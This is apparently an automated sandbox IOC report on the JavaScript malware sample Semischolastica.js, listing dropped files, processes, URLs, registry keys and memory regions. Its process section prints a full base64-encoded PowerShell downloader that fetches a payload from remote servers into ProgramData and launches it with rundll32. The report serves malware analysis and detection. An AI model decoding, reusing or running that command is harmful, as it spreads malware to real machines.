IOC Report
Semischolastica.js

loading gif

Files

File Path
Type
Category
Malicious
Semischolastica.js
ASCII text, with very long lines (47992), with CRLF line terminators
initial sample
malicious
C:\ProgramData\WeigelasScribbleable.js
ASCII text, with very long lines (47992), with CRLF line terminators
dropped
malicious
C:\ProgramData\WeigelasScribbleable.js:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eg3rnj2e.acv.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsaixmmc.yur.ps1
very short file (no magic)
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Semischolastica.js"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATwBRAEEAdQBBAEQARQBBAE0AZwBBADIAQQBDADQAQQBNAGcAQQAwAEEARABZAEEATABnAEEANQBBAEQAWQBBACIAOwAkAGgAeQBkAHIAYQB1AGwAaQBjAEMAYQBwAHAAYQBkAG8AYwBpAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAYwBBAE0AUQBBAHUAQQBEAEUAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMABBAEQASQBBAEwAZwBBAHkAQQBEAFEAQQBNAEEAQQA9AEkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AUQBBADMAQQBEAFEAQQBMAGcAQQB4AEEARABrAEEATgBRAEEAdQBBAEQARQBBAE4AUQBBAHkAQQBBAD0APQBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBjAEEAQgBoAEEASABRAEEAWgBRAEEAdQBBAEgATQBBAGQAUQBCAHcAQQBIAEEAQQBiAEEAQgA1AEEAQQA9AD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQAwAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQAaQBtAGIAcgBpAGMAYQB0AGUAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB4AEEASABVAEEAYQBRAEIAawBBAEcARQBBAGIAUQBBAHUAQQBHAFUAQQBiAGcAQgBuAEEARwBrAEEAYgBnAEIAbABBAEcAVQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQA9AFgAdABJAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBAHcAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAWQBBAFgAdABJAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAWQBRAEIAdQBBAEcAUQBBAGQAdwBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGQAQQBCAHAAQQBIAE0AQQAiADsAJABlAG4AYQBtAGkAbgBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVABlAG4AYQBpAGwAbABlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAZQBuAGEAbQBpAG4AZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHAAYQByAGEAcwBuAGkAYQBCAGUAbAB0AGUAbgBlAC4AVQBuAGgAaQB0AGMAaABlAGQARwBhAG0AYgBhAHMAOwAkAEgAYQB5AGMAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBPAEEAQQB1AEEARABnAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAGsAQQBNAEEAQQA9AEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBVAEEAZQBBAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCADMAQQBHAFUAQQBZAGcAQgBqAEEARwBFAEEAYgBRAEEAPQBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgATQBBAFkAdwBCAHAAQQBIAFEAQQBhAFEAQgBqAEEARwBFAEEAYgBBAEIARABBAEcARQBBAGMAZwBCADUAQQBHADgAQQBZAHcAQgBoAEEASABJAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQQA9AD0AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE4AQQBHAGsAQQBjAHcAQgB2AEEARwBNAEEAWQBRAEIAdwBBAEcANABBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgAxAEEASABNAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcABhAHIAYQBzAG4AaQBhAEIAZQBsAHQAZQBuAGUALgBVAG4AaABpAHQAYwBoAGUAZABHAGEAbQBiAGEAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAOQA4ADAANgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEASABBAEEAWQBRAEIAeQBBAEcARQBBAGMAdwBCAHUAQQBHAGsAQQBZAFEAQgBDAEEARwBVAEEAYgBBAEIAMABBAEcAVQBBAGIAZwBCAGwAQQBDADQAQQBWAFEAQgB1AEEARwBnAEEAYQBRAEIAMABBAEcATQBBAGEAQQBCAGwAQQBHAFEAQQBSAHcAQgBoAEEARwAwAEEAWQBnAEIAaABBAEgATQBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgByAGUAZQBjAGgAYwBsAG8AdABoAFMAbwB1AGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEASABJAEEAWgBRAEIAegBBAEgAQQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgBrAEEARQA4AEEAZABRAEIAMABBAEcASQBBAFkAUQBCAHkAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEATABnAEIAaABBAEcATQBBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEARwBFAEEAYgBnAEIAMABBAEgATQBBAGIAVgBaAHgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYQBBAEIAcABBAEgAQQBBAGQAdwBCAHkAQQBHAGsAQQBaAHcAQgBvAEEASABRAEEAWgBRAEIAeQBBAEgAawBBAEwAZwBCADEAQQBHAHMAQQBiAFYAWgB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAQQBCAGwAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAYwB3AEIAMABBAEYAQQBBAGMAZwBCAGwAQQBHAFUAQQBiAGcAQgBwAEEARwA0AEEAWgB3AEEAdQBBAEcASQBBAGMAZwBCADEAQQBIAE0AQQBjAHcAQgBsAEEARwB3AEEAYwB3AEEAPQAiADsAJABhAGwAaQBlAG4AaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBADUAQQBDADQAQQBNAFEAQQAxAEEARABjAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA=
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
https://github.com/imaya/zlib.js
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://github.com/Pester/Pester
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
There are 1 hidden URLs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
17FB9259000
heap
page read and write
2F2CFF000
stack
page read and write
1CC97BB4000
heap
page read and write
7FFC9FA01000
trusted library allocation
page read and write
17FB93ED000
heap
page read and write
17FB9172000
heap
page read and write
21D7D7C0000
trusted library allocation
page read and write
21D7D900000
trusted library allocation
page read and write
21D64F50000
trusted library allocation
page read and write
21D7DA60000
trusted library allocation
page read and write
17FB9290000
heap
page read and write
1CC99961000
heap
page read and write
21D65AA1000
trusted library allocation
page read and write
1CC9990C000
heap
page read and write
2F2DFF000
stack
page read and write
7FFC9FAB0000
trusted library allocation
page read and write
1CC9995C000
heap
page read and write
21D63140000
trusted library allocation
page read and write
17FB93B3000
heap
page read and write
17FB93F1000
heap
page read and write
1CC99981000
heap
page read and write
17FB72C8000
heap
page read and write
1CC97BB2000
heap
page read and write
21D65D8C000
trusted library allocation
page read and write
17FB910D000
heap
page read and write
17FB93CF000
heap
page read and write
1CC99D5B000
heap
page read and write
7FFC9FA40000
trusted library allocation
page execute and read and write
1CC9995D000
heap
page read and write
7DF405C00000
trusted library allocation
page execute and read and write
17FB9117000
heap
page read and write
17FB74E5000
heap
page read and write
21D66004000
trusted library allocation
page read and write
17FB9595000
heap
page read and write
1CC97CB0000
heap
page read and write
1CC99C3D000
heap
page read and write
1CC99935000
heap
page read and write
1CC99D63000
heap
page read and write
21D64F30000
trusted library allocation
page read and write
1CC97D35000
heap
page read and write
17FB939D000
heap
page read and write
1CC99D31000
heap
page read and write
17FB92AE000
heap
page read and write
17FB9195000
heap
page read and write
1CC99982000
heap
page read and write
21D64F9A000
heap
page read and write
21D65B2C000
trusted library allocation
page read and write
1CC99902000
heap
page read and write
21D7D980000
trusted library allocation
page read and write
21D62E00000
heap
page read and write
21D7D9FE000
trusted library allocation
page read and write
17FB94F4000
heap
page read and write
21D7D031000
heap
page read and write
17FB93F1000
heap
page read and write
21D64F50000
trusted library allocation
page read and write
1CC99DF5000
heap
page read and write
21D651B0000
trusted library allocation
page read and write
21D66015000
trusted library allocation
page read and write
21D7D24A000
heap
page read and write
17FB93EA000
heap
page read and write
1CC99DB3000
heap
page read and write
1CC99D62000
heap
page read and write
17FB9261000
heap
page read and write
21D7D540000
trusted library allocation
page read and write
1CC999CD000
heap
page read and write
1CC97D3A000
heap
page read and write
1CC99C03000
heap
page read and write
21D6300E000
heap
page read and write
17FB94EF000
heap
page read and write
17FB91B0000
heap
page read and write
17FB92B1000
heap
page read and write
21D64F50000
trusted library allocation
page read and write
17FB93E8000
heap
page read and write
17FB91A0000
heap
page read and write
1CC97AE9000
heap
page read and write
17FB9406000
heap
page read and write
17FB93F2000
heap
page read and write
1CC97D3D000
heap
page read and write
17FB928F000
heap
page read and write
17FB951C000
heap
page read and write
21D74FA1000
trusted library allocation
page read and write
17FB94B1000
heap
page read and write
1CC99AAC000
heap
page read and write
1CC9994C000
heap
page read and write
17FB92AE000
heap
page read and write
17FB9528000
heap
page read and write
17FB7270000
heap
page read and write
17FB94DD000
heap
page read and write
1CC99D3A000
heap
page read and write
7FFC9FAE0000
trusted library allocation
page read and write
21D62F90000
heap
page read and write
1CC97AFE000
heap
page read and write
21D65D79000
trusted library allocation
page read and write
1CC99C43000
heap
page read and write
17FB9129000
heap
page read and write
1CC97AFF000
heap
page read and write
17FB9110000
heap
page read and write
1CC99D87000
heap
page read and write
21D7D25A000
heap
page read and write
21D7D204000
heap
page read and write
17FB9406000
heap
page read and write
17FB9299000
heap
page read and write
17FB94DA000
heap
page read and write
21D65A99000
trusted library allocation
page read and write
B7D83FE000
stack
page read and write
21D65A36000
trusted library allocation
page read and write
B7D84FE000
stack
page read and write
32E168E000
stack
page read and write
17FB9583000
heap
page read and write
1CC99D11000
heap
page read and write
1CC99961000
heap
page read and write
17FB94E6000
heap
page read and write
1CC99D36000
heap
page read and write
17FB953C000
heap
page read and write
1CC97D3D000
heap
page read and write
21D65FB1000
trusted library allocation
page read and write
21D65A74000
trusted library allocation
page read and write
1CC99E89000
heap
page read and write
17FB94FC000
heap
page read and write
17FB92B0000
heap
page read and write
1CC97BAD000
heap
page read and write
1CC99BFD000
heap
page read and write
21D7DA30000
trusted library allocation
page read and write
17FB9155000
heap
page read and write
32E178E000
stack
page read and write
17FB93E8000
heap
page read and write
21D7D7F0000
trusted library allocation
page read and write
21D64F50000
trusted library allocation
page read and write
21D7D770000
trusted library allocation
page read and write
17FB74E9000
heap
page read and write
17FB951F000
heap
page read and write
21D65BA8000
trusted library allocation
page read and write
21D64F50000
trusted library allocation
page read and write
17FB9199000
heap
page read and write
21D65A7E000
trusted library allocation
page read and write
1CC99979000
heap
page read and write
17FB9406000
heap
page read and write
1CC99DB8000
heap
page read and write
17FB917D000
heap
page read and write
21D65AB3000
trusted library allocation
page read and write
17FB9501000
heap
page read and write
21D631B5000
heap
page read and write
21D7D091000
heap
page read and write
21D66A7D000
trusted library allocation
page read and write
21D7D094000
heap
page read and write
21D7DA14000
trusted library allocation
page read and write
17FB94EA000
heap
page read and write
17FB94E7000
heap
page read and write
17FB90B2000
heap
page read and write
1CC99D38000
heap
page read and write
1CC9991C000
heap
page read and write
21D66049000
trusted library allocation
page read and write
21D64FA1000
trusted library allocation
page read and write
21D64F70000
trusted library allocation
page read and write
17FB90C4000
heap
page read and write
21D64F39000
trusted library allocation
page read and write
21D63100000
heap
page readonly
7FFC9FA32000
trusted library allocation
page read and write
17FB73B8000
heap
page read and write
1CC99A01000
heap
page read and write
21D64F40000
trusted library allocation
page read and write
17FB9103000
heap
page read and write
1CC99D16000
heap
page read and write
17FB95F5000
heap
page read and write
1CC99D62000
heap
page read and write
21D64F50000
trusted library allocation
page read and write
17FB94DA000
heap
page read and write
1CC99DB5000
heap
page read and write
17FB72E7000
heap
page read and write
17FB9548000
heap
page read and write
1CC99900000
heap
page read and write
21D66A3D000
trusted library allocation
page read and write
17FB74ED000
heap
page read and write
17FB9285000
heap
page read and write
1CC99D7C000
heap
page read and write
17FB93F8000
heap
page read and write
17FB93EC000
heap
page read and write
21D63049000
heap
page read and write
17FB919D000
heap
page read and write
1CC9997B000
heap
page read and write
7FFC9FB00000
trusted library allocation
page read and write
17FB90BD000
heap
page read and write
21D65D6C000
trusted library allocation
page read and write
1CC99C11000
heap
page read and write
17FB8D60000
heap
page read and write
1CC999E9000
heap
page read and write
17FB9255000
heap
page read and write
1CC99D39000
heap
page read and write
1CC99D9C000
heap
page read and write
1CC99939000
heap
page read and write
21D65A47000
trusted library allocation
page read and write
21D64F50000
trusted library allocation
page read and write
17FB9526000
heap
page read and write
1CC99920000
heap
page read and write
1CC99DA1000
heap
page read and write
17FB9106000
heap
page read and write
17FB912C000
heap
page read and write
7FFC9F86C000
trusted library allocation
page read and write
21D63053000
heap
page read and write
1CC99948000
heap
page read and write
17FB9136000
heap
page read and write
21D7D1D1000
heap
page read and write
21D7CFA8000
heap
page read and write
7FFC9F970000
trusted library allocation
page execute and read and write
32E01C5000
stack
page read and write
21D64F60000
trusted library allocation
page read and write
1CC99904000
heap
page read and write
17FB90B7000
heap
page read and write
2F2EFE000
stack
page read and write
32E158F000
stack
page read and write
21D7D970000
trusted library allocation
page read and write
21D64F31000
trusted library allocation
page read and write
17FB94EC000
heap
page read and write
21D64F30000
trusted library allocation
page read and write
1CC99C40000
heap
page read and write
1CC97B9A000
heap
page read and write
21D7DA10000
trusted library allocation
page read and write
1CC9996B000
heap
page read and write
21D7D6D0000
trusted library allocation
page read and write
17FB93DE000
heap
page read and write
17FB939F000
heap
page read and write
1CC99DB4000
heap
page read and write
17FB90F9000
heap
page read and write
21D66C9C000
trusted library allocation
page read and write
17FB96B0000
heap
page read and write
1CC99FF6000
heap
page read and write
17FB74E0000
heap
page read and write
21D65D98000
trusted library allocation
page read and write
21D7D1CD000
heap
page read and write
17FB926B000
heap
page read and write
21D7D8C0000
trusted library allocation
page read and write
17FB954D000
heap
page read and write
21D65FA5000
trusted library allocation
page read and write
21D66A86000
trusted library allocation
page read and write
17FB94BD000
heap
page read and write
21D7D550000
trusted library allocation
page read and write
1CC97D39000
heap
page read and write
1CC99DB3000
heap
page read and write
21D65AB6000
trusted library allocation
page read and write
7FFC9FA80000
trusted library allocation
page read and write
21D65D48000
trusted library allocation
page read and write
1CC9993C000
heap
page read and write
21D7D077000
heap
page read and write
17FB9261000
heap
page read and write
17FB94FB000
heap
page read and write
1CC99D83000
heap
page read and write
7FFC9FB10000
trusted library allocation
page read and write
1CC97AE8000
heap
page read and write
1CC9996B000
heap
page read and write
17FB939D000
heap
page read and write
21D64F34000
trusted library allocation
page read and write
17FB94D6000
heap
page read and write
21D65DAD000
trusted library allocation
page read and write
1CC99D99000
heap
page read and write
17FB93F0000
heap
page read and write
17FB92A4000
heap
page read and write
21D631B0000
heap
page read and write
21D64F50000
trusted library allocation
page read and write
1CC99D3D000
heap
page read and write
17FB9503000
heap
page read and write
1CC97ACE000
heap
page read and write
21D64F50000
trusted library allocation
page read and write
17FB73B4000
heap
page read and write
21D7D950000
trusted library allocation
page read and write
17FB73BC000
heap
page read and write
17FB957C000
heap
page read and write
17FB93EE000
heap
page read and write
17FB9267000
heap
page read and write
21D7D08A000
heap
page read and write
1CC99959000
heap
page read and write
21D64F30000
trusted library allocation
page read and write
21D75007000
trusted library allocation
page read and write
21D74FB0000
trusted library allocation
page read and write
2F28F9000
stack
page read and write
21D7D4C0000
trusted library allocation
page read and write
1CC99DC9000
heap
page read and write
21D65D15000
trusted library allocation
page read and write
17FB94B1000
heap
page read and write
1CC99D3B000
heap
page read and write
21D65CAE000
trusted library allocation
page read and write
17FB93E9000
heap
page read and write
21D7D870000
trusted library allocation
page read and write
17FB7399000
heap
page read and write
17FB73B2000
heap
page read and write
17FB94DD000
heap
page read and write
7FFC9F9F2000
trusted library allocation
page read and write
21D630BD000
heap
page read and write
1CC99D20000
heap
page read and write
17FB90EC000
heap
page read and write
21D64EE0000
trusted library allocation
page read and write
1CC99DAD000
heap
page read and write
1CC97BAC000
heap
page read and write
1CC97D3B000
heap
page read and write
17FB93DE000
heap
page read and write
1CC99D46000
heap
page read and write
32E0B3F000
stack
page read and write
17FB9145000
heap
page read and write
17FB94FA000
heap
page read and write
1CC9995E000
heap
page read and write
7FFC9FA70000
trusted library allocation
page read and write
1CC995A0000
heap
page read and write
17FB9527000
heap
page read and write
1CC99D16000
heap
page read and write
21D7D099000
heap
page read and write
B7D88FE000
stack
page read and write
7FFC9FB50000
trusted library allocation
page read and write
21D7D730000
trusted library allocation
page read and write
21D7D520000
trusted library allocation
page read and write
21D7D9C0000
trusted library allocation
page read and write
1CC99911000
heap
page read and write
1CC99D61000
heap
page read and write
B7D8AFE000
stack
page read and write
1CC99DAC000
heap
page read and write
1CC99D5C000
heap
page read and write
21D7CFA0000
heap
page read and write
21D7D940000
trusted library allocation
page read and write
7FFC9FA04000
trusted library allocation
page read and write
7FFC9F863000
trusted library allocation
page read and write
1CC99BFD000
heap
page read and write
1CC97BAE000
heap
page read and write
7FFC9FBB0000
trusted library allocation
page read and write
1CC99DB4000
heap
page read and write
21D65D5A000
trusted library allocation
page read and write
21D65CE5000
trusted library allocation
page read and write
17FB73BE000
heap
page read and write
21D64F50000
trusted library allocation
page read and write
21D64F30000
trusted library allocation
page read and write
21D7D860000
trusted library allocation
page read and write
21D7D720000
trusted library allocation
page read and write
17FB93D8000
heap
page read and write
21D65A14000
trusted library allocation
page read and write
21D7D8E0000
trusted library allocation
page read and write
17FB917D000
heap
page read and write
17FB94E9000
heap
page read and write
17FB94BB000
heap
page read and write
21D7D8D0000
trusted library allocation
page read and write
B7D82F9000
stack
page read and write
17FB9501000
heap
page read and write
1CC99995000
heap
page read and write
21D65A25000
trusted library allocation
page read and write
21D7D750000
trusted library allocation
page read and write
17FB94DA000
heap
page read and write
21D7D268000
heap
page read and write
1CC99956000
heap
page read and write
1CC99F10000
heap
page read and write
1CC99D89000
heap
page read and write
7FFC9F853000
trusted library allocation
page execute and read and write
21D64DB7000
heap
page read and write
1CC99D32000
heap
page read and write
7FFC9F906000
trusted library allocation
page read and write
21D7D087000
heap
page read and write
17FB90F8000
heap
page read and write
17FB9406000
heap
page read and write
